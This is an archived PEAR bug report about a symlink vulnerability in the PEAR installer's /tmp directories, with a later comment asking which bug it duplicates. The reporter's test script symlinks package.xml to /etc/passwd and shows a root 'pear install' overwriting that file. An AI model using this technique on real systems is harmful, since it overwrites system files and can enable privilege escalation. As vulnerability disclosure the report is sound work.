From:  pear-qa@lists.php.net ("math.parent@gmail.com")
Date:  20 Oct 2015 12:14:11 Hong Kong Time
Newsgroup:  news.php.net/php.pear.bugs
Subject:  

[PEAR-BUG] Bug #18055 [Com]: [SECURITY]: Symlink attack

NNTP-Posting-Host:  null

Edit report at https://pear.php.net/bugs/bug.php?id=18055&edit=1

 ID:               18055
 Comment by:       math.parent@gmail.com
 Reported By:      ondrej at sury dot org
 Summary:          [SECURITY]: Symlink attack
 Status:           Duplicate
 Type:             Bug
 Package:          PEAR
 Operating System: Linux
 Package Version:  1.9.1
 PHP Version:      5.3.3
 Roadmap Versions: 
 New Comment:

Hello,

This bug is marked as duplicate. But duplicate of what?


Previous Comments:
------------------------------------------------------------------------

[2010-11-15 23:41:09] dufuz

-Status: Open
+Status: Duplicate


------------------------------------------------------------------------

[2010-11-14 15:24:37] ondrej

Description:
------------
There's symlink vulnerability when doing PEAR install. PEAR 
should really be using $(mktemp) for it's directories like 
download_dir, cache_dir and tmp_dir, and check whether the 
directory doesn't exists.

Test script:
---------------
# pear config-show  | grep /tmp
PEAR Installer cache directory cache_dir        /tmp/pear/cache
PEAR Installer download        download_dir    
/tmp/buildd/php5-5.3.3/pear-build-download
PEAR Installer temp directory  temp_dir         /tmp/pear/temp

# ls -ld /tmp/buildd/php5-5.3.3/pear-build-download
drwxr-xr-x 2 ondrej ondrej 4096 Nov 14 14:17
/tmp/buildd/php5-5.3.3/pear-build-download

# su - ondrej
$ cd /tmp/buildd/php5-5.3.3/pear-build-download
$ ln -s /etc/passwd package.xml
$ cat package.xml
root:x:0:0:root:/root:/bin/bash
[...]
$ logout

# pear install Net_Socket
downloading Net_Socket-1.0.10.tgz ...
Starting to download Net_Socket-1.0.10.tgz (5,429 bytes)
.....done: 5,429 bytes
install ok: channel://pear.php.net/Net_Socket-1.0.10


# head /etc/passwd


 Net_Socket
 pear.php.net
 Network Socket Interface
 Net_Socket is a class interface to TCP sockets.  It
provides blocking
  and non-blocking operation, with different reading and writing modes
  (byte-wise, block-wise, line-wise and special formats like network
  byte-order ip addresses).
 


Expected result:
----------------
Not overwriting system files. Not vulnerable to symlink attack.

Actual result:
--------------
Overwritten /etc/passwd just by creating right directories and 
symlinks.

------------------------------------------------------------------------


-- 
Edit this bug report at https://pear.php.net/bugs/bug.php?id=18055&edit=1